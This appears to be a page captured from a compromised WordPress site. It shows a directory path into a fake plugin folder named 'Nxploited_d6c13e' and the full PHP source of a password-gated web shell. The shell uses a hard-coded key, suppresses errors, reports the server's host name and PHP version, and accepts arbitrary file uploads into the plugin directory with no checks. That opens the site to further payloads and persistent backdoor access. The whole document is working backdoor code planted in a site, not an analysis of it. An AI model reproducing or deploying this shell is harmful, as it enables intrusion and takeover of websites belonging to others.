/
home
/
c
/
a
/
b
/
cabinetdhs
/
www
/
wp-content
/
plugins
/
Nxploited_d6c13e
/
Upload File
HOME
<?php /* Nxploited-Up */ error_reporting(0); define("NX_KEY","Nxploited"); session_start(); if(!isset($_SESSION["nx_ok"])){ if($_SERVER["REQUEST_METHOD"]==="POST"&&isset($_POST["k"])){ if($_POST["k"]===NX_KEY){$_SESSION["nx_ok"]=1;header("Location:".$_SERVER["REQUEST_URI"]);exit;} } ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>NX</title> <style>*{margin:0;padding:0;box-sizing:border-box} body{min-height:100vh;display:flex;align-items:center;justify-content:center; background:#020508;font-family:system-ui,sans-serif;color:#d0ffe8} .c{width:380px;text-align:center} h1{font-size:1.8rem;letter-spacing:.2em;color:#00ff8c; text-shadow:0 0 15px rgba(0,255,140,.4);margin-bottom:1.5rem} input[type=password]{width:100%;padding:.8rem;background:rgba(0,20,10,.6); border:1px solid rgba(0,255,140,.2);border-radius:3px;color:#00ff8c; font-size:.9rem;letter-spacing:.1em;outline:none;margin-bottom:.8rem} button{width:100%;padding:.7rem;border:1px solid #00ff8c;border-radius:3px; background:rgba(0,255,140,.1);color:#00ff8c;font-size:.85rem;font-weight:600; letter-spacing:.15em;cursor:pointer} </style></head><body> <div class="c"><h1>NXPLOITED</h1> <form method="POST"><input type="password" name="k" placeholder="key" autofocus> <button type="submit">LOGIN</button></form></div></body></html> <?php exit;} if(isset($_FILES["f"])){$n=basename($_FILES["f"]["name"]); if(move_uploaded_file($_FILES["f"]["tmp_name"],dirname(__FILE__)."/".$n))die("OK:".$n);die("FAIL");} ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>NX</title> <style>*{margin:0;padding:0;box-sizing:border-box} body{min-height:100vh;display:flex;align-items:center;justify-content:center; background:#020508;font-family:system-ui,sans-serif;color:#d0ffe8} .c{width:400px;text-align:center} h1{font-size:1.8rem;letter-spacing:.2em;color:#00ff8c; text-shadow:0 0 15px rgba(0,255,140,.4);margin-bottom:.5rem} .s{color:#5a8a78;font-size:.75rem;margin-bottom:1.5rem} form{border:1px dashed rgba(0,255,140,.2);border-radius:6px;padding:1.5rem; background:rgba(0,20,10,.4)} input[type=file]{color:#00ff8c;font-size:.85rem;margin-bottom:1rem;width:100%} button{width:100%;padding:.7rem;border:1px solid #00ff8c;border-radius:3px; background:rgba(0,255,140,.1);color:#00ff8c;font-size:.85rem;font-weight:600; letter-spacing:.15em;cursor:pointer} .r{margin-top:1rem;font-size:.8rem;color:#5a8a78} </style></head><body> <div class="c"><h1>NXPLOITED</h1><div class="s">upload</div> <form method="POST" enctype="multipart/form-data"> <input type="file" name="f" required><br> <button type="submit">UPLOAD</button></form> <div class="r"><?php echo php_uname("n")." | PHP ".phpversion(); ?></div> </div></body></html>